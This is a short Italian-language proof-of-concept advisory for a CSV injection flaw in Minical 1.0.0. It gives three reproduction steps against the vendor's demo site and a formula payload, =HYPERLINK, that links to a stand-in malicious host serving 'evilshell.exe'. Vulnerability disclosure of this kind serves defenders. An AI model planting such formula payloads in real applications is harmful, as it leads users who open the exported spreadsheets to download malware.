
Proof-of-concept che dimostra la vulnerabilità di CSV injection in Minical 1.0.0, con passaggi di riproduzione dettagliati ed esempio di payload.
Minical 1.0.0 è vulnerabile a CSV Injection.
Fornitore: https://github.com/minical/minical
Applicazione demo: https://demo.minical.io/
Passo 1: Naviga al modulo Contabilità e clicca su Crea Nuovo Cliente.

Passo 2: Inserisci il payload nel campo Nome e clicca su Crea.
Payload: =HYPERLINK("<https://malicious.com/evilshell.exe>","ClickHere")


Passo 3: Clicca su Scarica rapporto CSV e osserva il payload che viene renderizzato.
